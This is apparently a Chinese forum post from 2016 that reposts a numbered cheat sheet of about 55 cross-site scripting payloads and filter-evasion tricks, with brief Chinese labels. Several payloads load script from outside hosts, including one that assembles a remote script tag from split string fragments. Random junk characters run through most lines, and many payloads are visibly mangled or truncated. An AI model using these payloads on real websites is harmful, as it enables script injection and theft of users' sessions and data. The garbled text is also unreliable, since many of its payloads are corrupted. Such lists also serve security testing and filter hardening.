(1)普通的XSS JavaScript注入+ V* ?" f) F3 ]- a- x
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>. i+ h! I; C s( N
(99)另类弹框8 Z, N+ \5 Y. [7 m: m
<q/oncut=alert()>1' M5 s) V2 ^1 z0 r/ P7 g! L
<s/onclick=alert()>b' s" R4 |( f" m& @
<XSS=" onclick="alert(1)//">clickme</SSX=">
g! M6 c. m- q6 e <zzz onclick=alert`1`>clickme</zzz>
- ?: X8 n: U$ M& ^: ]+ c8 U <a onclick=alert`1`>clickme</a>2 `" K4 j" J! W0 E: K3 E
<a=">clickme</a=">$ Q1 {* `; d* o) ]8 ~& N
<a=">clickme</a>
2 r* g9 v( }. M. Q6 J+ F" w<z=">clickme</z="># z+ u9 t6 Q5 ~: u! h0 p
<z onclick=alert`1`>clickme</z>( u& O$ b& \2 z: q
0 K' ^; U6 }+ S1 `! w. R0 ~(2)IMG标签XSS使用JavaScript命令' E2 D5 n: ]+ j3 C
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>; ~1 I1 B: d' F3 {8 l9 ?0 @
' Y" D4 c: t' ?0 Z3 s/ d" u, |
(3)IMG标签无分号无引号$ b7 L" Z5 M5 M ?
<IMG SRC=javascript:alert(‘XSS’)>* P6 p& \0 X8 A% Q
9 j, i$ K1 l7 z$ s/ ?(4)IMG标签大小写不敏感5 k* t8 U8 t! s3 j
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>1 G7 G* ^6 L5 k( R
8 F3 V* }: b& O
(5)HTML编码(必须有分号)2 C! c. N# x: O2 W& W
<IMG SRC=javascript:alert(“XSS”)>1 Y8 b4 u5 ?; y6 D- a
8 P0 _; l* @' f(6)修正缺陷IMG标签
9 l1 O! k' |7 F8 m<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>6 x9 B) t, ?' Z4 C. |/ O" S* _
9 w3 a9 v z: e7 r& ?7 b4 [(7)formCharCode标签(计算器)! k5 {! Z/ B0 a4 K& g
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
1 F6 j: D X, ^- G$ Z0 N
6 I8 w2 _1 c. \(8)UTF-8的Unicode编码(计算器)! m) g' s1 ?. G- x/ e
<IMG SRC=jav..省略..S')>
) h1 D/ g# R0 L& i; {: h: f% S, n$ B/ q# r2 H) @1 [
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)0 _8 q: P7 a4 L) Z' B5 E2 ]
<IMG SRC=jav..省略..S')>. |- o0 }& T/ j& e$ [# M
# D- G) i7 y7 t
(10)十六进制编码也是没有分号(计算器)
$ H% h' |$ @$ ^( S<IMG SRC=\'#\'" /span>
4 T: K2 C& g _: t
2 ]* p% E- |' t' x(11)嵌入式标签,将Javascript分开
( C: n( X6 ~" k# K+ [<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
" E/ U5 T# ]+ V4 m$ M; ^
8 j/ C- v* t4 u(12)嵌入式编码标签,将Javascript分开" ?3 R5 c0 J X- R* r
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”> I5 ]0 S/ x) s
: V8 W# k8 x8 ^- p* `4 e. k(13)嵌入式换行符
! i& V/ _( C: K6 d/ ?<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
7 `1 d1 u% j& f; |% w" g3 S& `/ X4 @ U
(14)嵌入式回车! H( ^3 t1 ?7 |0 m" I0 Y
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>) m$ D }$ [0 `, Q+ G1 K6 r- q
% i- [5 o2 V# @' w( @" X+ o) T(15)嵌入式多行注入JavaScript,这是XSS极端的例子" q- y' } D# F3 T2 m; \) E
<IMG SRC=\'#\'" /span>
$ }; y" ]/ u' ~9 m+ H
% c$ Q8 U+ `: p7 i0 V/ L9 U(16)解决限制字符(要求同页面) X$ S" @- f! t) F$ o8 |
<script>z=’document.’</script>
& o: K* J5 p6 H( T1 y ^+ S4 v<script>z=z+’write(“‘</script>5 a. X6 r6 K+ R/ j' S7 h( z0 j$ o
<script>z=z+’<script’</script>
7 ^9 R. L* D- ?. A# L<script>z=z+’ src=ht’</script>
. w- k3 W' t" ^4 ^. a<script>z=z+’tp://ww’</script>
Z6 i6 r1 \ }' D" F<script>z=z+’w.shell’</script>$ g) E0 i; j j5 E5 ~
<script>z=z+’.net/1.’</script>. {9 F9 ^" {$ i9 ?
<script>z=z+’js></sc’</script>
5 e- S) Z- o) [: Q<script>z=z+’ript>”)’</script> B5 W9 T9 k( Z. ^
<script>eval_r(z)</script>; V* x6 [9 h x+ X: J* J4 g' V
1 _- V8 H7 C( W4 k1 \
(17)空字符
' c. I% q4 N' `! Z8 t d+ T& q/ H! Xperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out3 \2 a" U z+ I& u: E6 x/ g7 Q9 ~
/ n( F1 x" f7 g4 W5 ]0 m
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
' v0 n0 k0 h; K# z/ Z' h, @perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out0 v: J% y/ D9 B. U) ~( G; R
5 A" O: r: e; u& v( J! x7 O+ P(19)Spaces和meta前的IMG标签
' o& o9 _* x9 N. {& o" ?3 X5 v<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
k: s) g% n ^3 I* C- k1 u( Y5 l* f
(20)Non-alpha-non-digit XSS2 ]$ p/ j% l% Z
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
! K3 _( c7 m, D" M" { M) O
, _& K. A1 e5 |! j" X(21)Non-alpha-non-digit XSS to 2
4 L* s/ f7 p" v9 Y<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>7 J: h* `+ Q7 M1 d) ]: T& m5 O# X
) k, `3 E9 _) r1 H& I. l! ]/ y
(22)Non-alpha-non-digit XSS to 3
, H. \: n- r3 R6 V3 I( Y9 w<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT> M! X/ h$ N" l u# l, ^, {
/ O; z4 S9 k6 }, V
(23)双开括号7 k6 f8 o b! z" V) X+ S# ^
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
, d+ o. n9 b& h0 `8 \3 u6 A% ^- v" y& T5 z) }& q
(24)无结束脚本标记(仅火狐等浏览器)8 b/ e, w0 |2 B+ V/ X
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>4 Y! o# c! p: e5 f/ H; |
4 t. a2 s" T- i9 f: |
(25)无结束脚本标记2" K y9 L1 ]. y y( [3 M s) \
<SCRIPT SRC=//3w.org/XSS/xss.js>
4 e& F/ c" S) F/ W4 C: P# `: t* g$ T) V* U& }* W5 }$ _
(26)半开的HTML/JavaScript XSS
: E6 D2 T$ a) j$ z3 O<IMG SRC=\'#\'" /span>" x+ C6 i" F6 Z
! D9 O) \- Q7 A* @
(27)双开角括号
4 p( H$ R) ]0 E4 n& [2 n: I! i1 f% c<iframe src=http://3w.org/XSS.html <
6 H& w: f$ _- l z) Y; c6 s8 z4 s( a% ]8 P. A" n' Z) H
(28)无单引号 双引号 分号
' X% t) `0 V9 l! ~0 l<SCRIPT>a=/XSS/
& j, d0 f0 }1 r% nalert(a.source)</SCRIPT>
3 [3 ?7 A6 U; v$ N. m+ F& F5 H1 M1 U% S# M: ?
(29)换码过滤的JavaScript# X3 ]* y. |6 O! x& I
\”;alert(‘XSS’);//
2 j" O( B& h3 N/ d$ ^# T1 s; R: J! T4 ~
(30)结束Title标签' w2 q$ c! L+ d$ n9 H) [5 L4 K1 v5 m
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>! s, X1 M8 [- x; i f
. b% e/ x& ]5 P
(31)Input Image
0 w! t$ d* l7 ]) p: x W- b1 U<INPUT SRC=\'#\'" /span>
) k5 h: s& U5 N, E6 f
4 r9 o. g% o6 S(32)BODY Image! p3 C) T3 N, B- [7 g: Y7 ?1 o4 J4 z. v
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>. H! u0 C4 X$ Z+ [
% ]+ X: Y4 B( W/ j* i/ C% T(33)BODY标签
& V6 r0 W: U2 F/ r, ]<BODY(‘XSS’)>: Q6 X& S1 i7 ?& f1 T9 M
# N9 |1 z# n5 X
(34)IMG Dynsrc
: r6 R2 }; ]# V* W5 L3 \5 L7 T# n2 k<IMG DYNSRC=\'#\'" /span>
' \- T3 u6 N& a" n& {# S! v) h
: n/ U) _! X! W; C(35)IMG Lowsrc
c1 S; o. n3 ^+ @<IMG LOWSRC=\'#\'" /span>, w, i8 n; u$ J
& k: W; T7 o2 u* F
(36)BGSOUND
. g5 x7 h7 P" @4 u3 }<BGSOUND SRC=\'#\'" /span>" o9 ~1 C6 |; G; @& m- O7 R9 i+ H! F
3 r6 |4 e8 P" `% r* `, R; J, j5 J
(37)STYLE sheet
9 x8 J- P; g0 i8 Y! W: m<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>; G Q+ u/ ~, C/ `, ~4 l
# B& p& C- c( F( t6 ?9 _(38)远程样式表
7 v4 V& N0 }% U E. a- c<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>* @6 |: Y- u7 O0 B/ y# B
: ]6 Y! w \" \ V
(39)List-style-image(列表式)
, g+ \4 V# C/ f/ ^$ U<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
" t2 F5 ~7 @- p/ ~. b
+ W* a0 W9 t5 M2 N$ U/ S' A9 }! U(40)IMG VBscript
% a4 D1 U4 l- k! J- e/ I<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
. G& x# C3 ~2 ~6 n" `1 F( A, t/ i/ ~
(41)META链接url
; o& u. N) \: g. ?0 f4 @- @0 ]<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
# [5 B z, k& Y! \# ]
& D: e. f' I/ z6 g$ i% i/ x(42)Iframe/ d' O, w# V/ i8 R7 ?# ], m# h% T
<IFRAME SRC=\'#\'" /IFRAME>' Z( A7 V P+ S4 c8 \+ S
- B0 C3 \% Z( Q6 R$ X7 `1 L(43)Frame3 q) H) Z; a7 [# ? n2 b
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>. T& W% f9 b: P" l8 O- b1 D$ W
' X' t* T! ^+ Q( ?% i+ m: X(44)Table/ B) N4 \, C: X+ P/ W* l
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
1 I( ]% a% v! L
) Q/ ]% \$ W1 _+ A- z/ I: o: q) E(45)TD9 [: P+ H/ X0 U. n v1 V. {
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
( J. w" N0 h/ d, P% K! \1 E3 J0 f1 \$ ]! r5 Q
(46)DIV background-image
1 a. }. G$ y# ~2 F<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
7 r1 q2 D- x T' m! x' y* k) L. B: C1 _! B: @! Z" p \) Z4 d5 \: h
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)2 g. u" N* ?6 N3 U
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>% G" \- I6 t( \1 }* t, z1 x3 W) B
( \& m- g- m8 b
(48)DIV expression
6 O1 N) c9 G6 \7 [8 k<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
" e$ t- k" P5 y6 B. b C( F( ?2 F$ a! k+ u/ v, I
(49)STYLE属性分拆表达
0 x, i) }! d7 M<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>: N+ @( r7 r0 n8 n7 F1 S) j
. h( ] U2 S" ?3 n/ M4 m, d7 |
(50)匿名STYLE(组成:开角号和一个字母开头)
3 t! C; M. ~/ o# F2 q7 W. h<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
$ e. J; \# [( v
+ x) a/ s0 k! m(51)STYLE background-image6 ^6 R9 ]3 ]! b# `- k& H4 Y p8 r9 d
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>' q' ~! t( U5 g
4 ~: R) R- l! ^- g( t- h( Y
(52)IMG STYLE方式8 M2 J; r: I0 }% [
exppression(alert(“XSS”))’>
" N4 w. e8 G2 N$ a# i% C6 K+ }. s) s0 ^4 d1 s3 p; v; p
(53)STYLE background
* ~/ D2 u/ ^$ t7 P9 r3 R# G, K<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>+ J7 V# c1 s" ^. C
& G8 V, I1 ]3 |! S(54)BASE2 d4 U$ F* B9 l3 k
<BASE HREF=”javascript:alert(‘XSS’);//”>
# ] \* L1 x; f& m8 y1 X3 K
: q7 ], N- n1 o* e& C+ Z(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
0 d9 T j/ q' s+ q+ \/ |3 k<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>4 s) W( ?. @/ X! a4 i+ ?# S( r
|
发表于 2016-4-28 10:06:15
收藏
支持
反对